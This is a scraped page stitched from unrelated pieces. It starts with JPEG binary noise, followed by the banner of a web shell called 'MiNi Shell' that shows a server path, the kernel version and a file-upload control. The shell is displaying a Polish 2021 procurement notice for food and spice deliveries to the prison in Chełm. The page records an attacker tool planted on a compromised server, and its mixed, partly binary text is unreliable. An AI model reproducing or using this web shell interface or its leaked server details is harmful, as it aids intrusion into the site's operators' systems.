JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210329/0002461401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00024614 z dnia 2021-03-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów spożywczych, przypraw i mrożonek rybnych i warzywnych do Zakładu Karnego w Chełmie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny Chełm</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320041</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 112</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825627853</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">825653557</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_chelm@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.swnet.sw.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zakład Karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów spożywczych, przypraw i mrożonek rybnych i warzywnych do Zakładu Karnego w Chełmie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6039215b-908c-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00024614</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.zp.sw.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://moj.gov.pl/nforms/ezamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortaloraz warunkach korzystania z elektronicznej platformy usług administracji publicznej(ePUAP)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1. administratorem Pani/Pana danych osobowych jest Dyrektor Zakładu Karnego w Chełmie, ul. Kolejowa 112, 22–100 Chełm;2. inspektor ochrony danych w Zakładzie Karnym w Chełmie, tel.: (82) 562 78 53 , e-mail: iod_chelm@sw.gov.pl;3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego w trybie podstawowym zgodnie z art. 275 pkt 1 ustawy Pzp;4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej „ustawa Pzp”;5. Pani/Pana dane osobowe będą przechowywane, zgodnie z ustawą Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;8. posiada Pani/Pan:na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych1;na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2;prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9. nie przysługuje Pani/Panu:w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/kw.2232.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 122505,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Groszek konserwowyOpakowanie: puszka metalowa o gramaturze w przedziale od 0,40 – 3,50 kg, z roślin niemodyfikowanych genetycznie. Data ważności produktu: co najmniej 6 miesięcy od dnia dostawy.Ilość:1500 kg,CPV -15331462-32.Chrzan tartyOpakowanie: słoik szklany lub wiaderka plastikowe o gramaturze od 0,50-5,00 kg.Data ważności: produktu co najmniej 6 miesięcy od dnia dostawy. Ilość:1000 kg,CPV - 15331000-73.Koncentrat pomidorowy 30%Opakowanie: słoik szklany o gramaturze w przedziale od 0,90-2,00 kg lub puszka metalowa o gramaturze od 1 do 5 kg.Data ważności produktu: co najmniej 6 miesięcy od dnia dostawy. Ilość: 5000kg, CPV - 15331425-24.Groch łupany Opakowanie: worki papierowe lub z polipropylenu pakowany od 15-25 kg. Wymagania jakościowe suchego ziarna: barwa charakterystyczna, brak zanieczyszczeń, suche, nieuszkodzone przez szkodniki i choroby, ziarno nie może być stęchłe ani spleśniałe, z roślin niemodyfikowanych genetycznie.Data ważności produktu: co najmniej 3 miesiące od dnia dostawy. Ilość: 1500 kg, CPV 15331133-85.OcetOpakowanie: w opakowaniach szklanych lub butelkach plastikowych o pojemności od 0,50 – 1,00 litra. Ocet powinien być bezbarwny, przezroczysty, bez osadu, o swoistym smaku i zapachu. Data ważności produktu: co najmniej 6 miesięcy od dnia dostawy. Ilość:600kg,CPV - 15871100-56.Sól jodowania (w opakowaniach 1 kg)Opakowanie: Sól pakowana w worki foliowe w opakowaniach 1 kg. Cechy organoleptyczne soli: śnieżnobiała, miałka, drobnoziarnista, łatwo rozpuszczalna w wodzie. Nie może być niczym zanieczyszczona. Data ważności produktu: co najmniej 6 miesięcy od dnia dostawy. Ilość: 1500 kg - CPV 15872400-57.Fasola jaś dużaOpakowanie: worki papierowe lub z polipropylenu pakowana od 15-25 kg. Wymagania jakościowe suchego ziarna: barwa charakterystyczna, brak zanieczyszczeń, suche, nieuszkodzone przez szkodniki i choroby, ziarno nie może być stęchłe ani spleśniałe, z roślin niemodyfikowanych genetycznie.Data ważności produktu: co najmniej 3 miesiące od dnia dostawy. Ilość:3000 kg CPV - 15331130-78.Herbata GranulowanaOpis: smak i aromat naparu herbacianego charakterystyczny, bez goryczy. Opakowanie: pakowana w przedziale od 1 - 10 kg, w opakowaniu papierowym lub z tworzyw sztucznych. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny. Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość: 500kg CPV - 15863000-59.MusztardaOpis: Musztarda powinna mieć jednolitą półpłynną masę o barwie żółtej do jasnobrunatnej, o smaku lekko piekącym i zapachu octu.Opakowanie: opakowanie pcv o wadze od 0,5 - 1,00 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, pleśń na powierzchni musztardy lub fermentacja Data ważności produktu co najmniej 6 miesięcy od dnia dostawy.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:500kg CPV -15871250-110.KetchupOpis: jednolita półpłynna masa o charakterystycznej dla wyrobów czerwonej barwie, o smaku łagodnym .Opakowanie: opakowania pcv o wadze od 0,5 - 1,00 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, pleśń na powierzchni fermentacja. Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:500 Kg CPV - 15871230-511.Woda mineralna niegazowana 1,5 lOpakowanie: w butelkach plastikowych 1,5 litra. Data ważności produktu: co najmniej 6 miesięcy od dnia dostawy. ilość:15 000 l CPV- 15981200-0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 65717,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331462-3 - Groch puszkowany</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331462-3 - Groch puszkowany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin reklamacji towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100% <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Barszcz biały w proszkuOpis:. Zupa baza w proszku do przygotowywania zup.Opakowanie: papierowe w wewnątrz pokryte workiem foliowym od 1-10 kg Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:250kg15891000-02.Zupa pieczarkowa w proszkuOpis: Zupa baza w proszku do przygotowywania zup. Opakowanie: papierowe w wewnątrz pokryte workiem foliowym od 1-10 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość: 250 kg 15891000-03.Żurek w proszkuOpis: Zupa baza w proszku do przygotowania zup. Opakowania: papierowe w wewnątrz pokryte workiem foliowym pakowana od 1-10 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:250 15891000-04.Sos grzybowy w proszkuOpis: Baza w proszku do przygotowania sosów. Opakowania: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-10 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość: 250 kg15871000-45.Sos pieczeniowy w proszkuOpis: Baza w proszku do przygotowania sosów. Opakowania: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-10 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:250 kg15871000-46.Rosół drobiowy w proszkuOpis: Bulion baza w proszku do przygotowania wywarów na zupę. Opakowania: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-10 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.ilość:800 kg15891000-07.Przyprawa do potraw w proszku Opis: Przyprawa warzywna do zup, mięsa i sosów. Opakowania: papierowe w wewnątrz pokryte workiem foliowym pakowana od 1-10 kg.Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny, zapleśniały.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość: 800 kg15891000-08.Przyprawa do zup w płynieOpis: Przyprawa warzywna do zup, mięsa i sosów. Opakowanie: butelki (opakowania) plastikowych PCV od 1-10 kg.Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:800l15870000-79.Pieprz ziołowyOpis: Zapach i smak charakterystyczny dla przyprawy, przyprawa zmielona (proszek).Opakowanie: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-3 kgCechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:70 kg15872100-210.Pieprz naturalny mielonyOpis: Zapach i smak charakterystyczny dla przyprawy, przyprawa zmielona (proszek). Opakowanie: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-3 kgCechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:70 kg15872100-111.Papryka mielona słodkaOpis: Zapach i smak charakterystyczny dla przyprawy, przyprawa zmielona (proszek). Opakowanie: papierowe w wewnątrz pokryte workiem foliowym pakowany od 1-3 kg.Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:50 kg15870000-712.MajeranekOpis: Zapach i smak charakterystyczny dla przyprawy.Opakowanie: papierowe lub worek foliowy od 0,5-2 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:50 kg15870000-713.Liśc laurowyOpis: Zapach i smak charakterystyczny dla przyprawy.Opakowanie: papierowe lub worek foliowy od 0,5-2 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość: 30 kg15870000-714.Ziele angielskieOpis: Zapach i smak charakterystyczny dla przyprawy.Opakowanie: papierowe lub worek foliowy od 0,5-2 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:30 kg15870000-715.Czosnek granulowanyOpis: Zapach i smak charakterystyczny dla przyprawy.Opakowanie: papierowe lub worek foliowy od 0,5-2 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:40 kg15870000-716.Koper suszonyOpis: Zapach i smak charakterystyczny dla przyprawy.Opakowanie: papierowe lub worek foliowy od 0,5-2 kg. Cechy wykluczające: niepożądane wady organoleptyczne: zapach i smak obcy, zabrudzenie, towar wilgotny.Data ważności: termin przydatności do spożycia co najmniej 6 miesięcy od dnia dostawy.Ilość:30 kg15870000-7 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 13056,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15891000-0 - Zupy i buliony</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15891000-0 - Zupy i buliony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin reklamacji towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> 